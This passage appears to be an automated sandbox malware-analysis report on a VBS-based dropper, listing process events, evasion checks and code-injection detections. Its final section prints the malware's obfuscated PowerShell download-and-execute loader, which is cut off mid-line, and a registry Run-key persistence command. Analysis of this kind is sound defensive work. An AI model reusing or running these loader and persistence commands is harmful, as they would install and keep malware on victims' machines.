              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Potential evasive VBS script found (sleep loop)
              Source: Initial fileInitial file: Do While Glemselens.Status = 0 WScript.Sleep 100
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5297Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4598Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7509Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2096Jump to behavior
              Source: C:\Windows\System32\wscript.exe TID: 7888Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8132Thread sleep time: -1844674407370954s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7536Thread sleep time: -1844674407370954s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 8100Thread sleep count: 3495 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 8100Thread sleep time: -10485000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 8100Thread sleep count: 6497 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 8100Thread sleep time: -19491000s >= -30000sJump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: wscript.exe, 00000000.00000002.1352815477.0000018D17615000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: wscript.exe, 00000000.00000003.1350699724.0000018D17618000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
              Source: wscript.exe, 00000000.00000003.1342843378.0000018D193D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1353129640.0000018D193F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1350898356.0000018D193F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1351557174.0000018D19432000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1343039508.0000018D193F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1341840153.0000018D19432000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1353129640.0000018D19432000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1351557174.0000018D193F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1343142980.0000018D19432000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1350898356.0000018D19432000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: powershell.exe, 00000004.00000002.1472500787.00000229FE60A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: PING.EXE, 00000002.00000002.1347682734.00000258B9309000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlltt
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Early bird code injection technique detected
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
              Yara detected Powershell download and execute
              Source: Yara matchFile source: amsi64_7972.amsi.csv, type: OTHER
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7972, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7216, type: MEMORYSTR
              Queues an APC in another process (thread injection)
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
              Writes to foreign memory regions
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 3E80000Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping gormezl_6777.6777.6777.677eJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Semipoor Radiculose Hornuglen Laminaterne Cadesse Freespac #>;$Henkastet='Splenetically35';<#Kaskoforsikre Bollix Rdslens #>;$Stepway=$Sammentrdninger+$host.UI; function Tuggery($cracks){If ($Stepway) {$Rupturable++;}$Seerlike=$Ordrebeholdningernes+$cracks.'Length'-$Rupturable; for( $Pickaxes=4;$Pickaxes -lt $Seerlike;$Pickaxes+=5){$Undertrkkene=$Pickaxes;$Fascinationen+=$cracks[$Pickaxes];$Bronchoesophagoscopy='Noomis';}$Fascinationen;}function Phonogramically($Karaktermord){ . ($fritflue) ($Karaktermord);}$Finalismens=Tuggery 'SurmMPo aoUnsezAllei,syklTra.l Proa Rep/Spar ';$Finalismens+=Tuggery 'N ct5S ng. Kar0Deut Ne (DeliWYdmyipaponbombdBoreoRegnwstansK tt AcouNValvTTabl Lept1Rere0Fami.M al0 ps;Unsc Ha,nWaeroiLyrinRefl6Star4sca ;Clip chylxFutu6Li h4tax ; Blr DefarCryov Q,i:Tinc1Re.i3 Kod1Stop.Term0 .eo)Sp.j FabuGTraneS.ltcDentk rinoB ne/Unde2Si n0Konk1Kabi0Hu.d0Umbr1 Agn0Note1Guri SndFautoiSa,drAnteeCob fLuckoPa,ax van/ gtp1Per.3Sini1Salm.Sta 0L.ks ';$brokbinds=Tuggery 'stafu.ankSMongE HabR unm-ste aH lkg T,oeBedrNF.lutBedr ';$Hematozoan=Tuggery 'noeshBagetKoortRefepUransDisk:clei/Krak/ Sliw RenwA,etwTekn. AntgTnksr Sluo DecuSublpVi.erOveri,apoaProgm Hou.WithcClaso jemRa,e/SminMF.vraEr,vnNiddd DrisBipecMandhByzaaPre uArnuvVicaiEr.vnIn qiFraasRavemSysseDefl. DissHemanLovlp rug> RenhBuk tCheftRej.pSands emi:Verr/Sple/OejnbOrrorKaktuSub t Sa aUdsd.Ahorp.lurl Sy /Sor MHkkeaAfg n etrdMi lsDivucheelhDisca Tu uShawvAfstinon nSpkkiForvsFo mm.lageSkru.Ca bs RevnBesppAnel ';$dacha=Tuggery ' Shi>Blue ';$fritflue=Tuggery 'Resai PineRagsX ugg ';$Dessinatren='solstraalehistoriers';$Sygne='\Sttefiskenes.Tav';Phonogramically (Tuggery 'Prod$ BolGSydkL.umaOTratbbetaa SpolBis.: elldTezcIPrsiSA.beKStanS Absp Proe HanCCystiHa,tF ngmiTunnKNonpA alot laiIAmbiolaboNLeukeboflrKontS Syn2 Kla4Exci8Ceph=chit$Ungde L sN ftev Non:ewerAR vapSupepAdu.DSataAB ugtbefaatuft+G.da$CplbSAutoYFritG waiNAdfrEBg r ');Phonogramically (Tuggery 'br d$UratGRelalHerbo U,hb YikaTo,mL H.k:CanaBOpsirSkibUSlukgMonoeEsquRFires ixeSaffRCa sV ConIApatc BudERist=Komm$be yhMurdEBeweMEurhaPigrtUnciobadezSmalOForuADoorNMeal. De,s En PExodl.eenIHemiTHyal( agt$GangDPaniaschlC SatHSjusafunk)t,im ');Phonogramically (Tuggery 'thro[FlerNHeptECasttCaes. Pe SK mmECardRStamVTilbiHaanCLns eAdipPDr.goDramiChronKbslt .limVar.A acknBe oaAdelgHed.eSatcR nde]Enke:Ring: Pr s Kone U gCLae,U SneRKariI TreTVejrysup p TrarUimoo SaltKltroAfsvCGlucoEpenLFjel Tris=beha P ke[RunoNSweeETab.tV.nd.AmbasIndkeEva C Mi.UDestRBeslIEuphtTe,ly VirpRaadrE erO.ascTBr.rOHyg C Diao.epaLF,sttGoniYHestP v eEJobb]Si.d:Dkna:D taTJa.bL,ukksSe i1Dich2Olip ');$Hematozoan=$Brugerservice[0];$Discriminatingness=(Tuggery ' asd$ ntegLu tL eclOAntibS,rhAFabrLF lk:Retsg FolrRygeUUdreN ChaDMil.LBlemNSk,fS Pho=CoutNIndieAporwUros-CaseO rthbHannjReg eAst,C T it ggr PresVid.YsoliS ult BliECombm Ste.MandnTh.rEst.lTSali.Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Griddles% -windowstyle 1 $Coagula=(gp -Path 'HKCU:\Software\Meddling\').Udmundingers;%Griddles% ($Coagula)"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Griddles% -windowstyle 1 $Coagula=(gp -Path 'HKCU:\Software\Meddling\').Udmundingers;%Griddles% ($Coagula)"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" " <#semipoor radiculose hornuglen laminaterne cadesse freespac #>;$henkastet='splenetically35';<#kaskoforsikre bollix rdslens #>;$stepway=$sammentrdninger+$host.ui; function tuggery($cracks){if ($stepway) {$rupturable++;}$seerlike=$ordrebeholdningernes+$cracks.'length'-$rupturable; for( $pickaxes=4;$pickaxes -lt $seerlike;$pickaxes+=5){$undertrkkene=$pickaxes;$fascinationen+=$cracks[$pickaxes];$bronchoesophagoscopy='noomis';}$fascinationen;}function phonogramically($karaktermord){ . ($fritflue) ($karaktermord);}$finalismens=tuggery 'surmmpo aounsezallei,sykltra.l proa rep/spar ';$finalismens+=tuggery 'n ct5s ng. kar0deut ne (deliwydmyipaponbombdboreoregnwstansk tt acounvalvttabl lept1rere0fami.m al0 ps;unsc ha,nwaeroilyrinrefl6star4sca ;clip chylxfutu6li h4tax ; blr defarcryov q,i:tinc1re.i3 kod1stop.term0 .eo)sp.j fabugtranes.ltcdentk rinob ne/unde2si n0konk1kabi0hu.d0umbr1 agn0note1guri sndfautoisa,dranteecob fluckopa,ax van/ gtp1per.3sini1salm.sta 0l.ks ';$brokbinds=tuggery 'stafu.anksmonge habr unm-ste ah lkg t,oebedrnf.lutbedr ';$hematozoan=tuggery 'noeshbagetkoortrefepuransdisk:clei/krak/ sliw renwa,etwtekn. antgtnksr sluo decusublpvi.eroveri,apoaprogm hou.withcclaso jemra,e/sminmf.vraer,vnniddd drisbipecmandhbyzaapre uarnuvvicaier.vnin qifraasravemsyssedefl. disshemanlovlp rug> renhbuk tcheftrej.psands emi:verr/sple/oejnborrorkaktusub t sa audsd.ahorp.lurl sy /sor mhkkeaafg n etrdmi lsdivucheelhdisca tu ushawvafstinon nspkkiforvsfo mm.lageskru.ca bs revnbesppanel ';$dacha=tuggery ' shi>blue ';$fritflue=tuggery 'resai pineragsx ugg ';$dessinatren='solstraalehistoriers';$sygne='\sttefiskenes.tav';phonogramically (tuggery 'prod$ bolgsydkl.umaotratbbetaa spolbis.: elldtezciprsisa.bekstans absp proe hanccystiha,tf ngmitunnknonpa alot laiiambiolabonleukeboflrkonts syn2 kla4exci8ceph=chit$ungde l sn ftev non:ewerar vapsupepadu.dsataab ugtbefaatuft+g.da$cplbsautoyfritg wainadfrebg r ');phonogramically (tuggery 'br d$uratgrelalherbo u,hb yikato,ml h.k:canabopsirskibuslukgmonoeesqurfires ixesaffrca sv coniapatc buderist=komm$be yhmurdebewemeurhapigrtunciobadezsmaloforuadoornmeal. de,s en pexodl.eenihemithyal( agt$gangdpaniaschlc sathsjusafunk)t,im ');phonogramically (tuggery 'thro[flernheptecasttcaes. pe sk mmecardrstamvtilbihaanclns eadippdr.godramichronkbslt 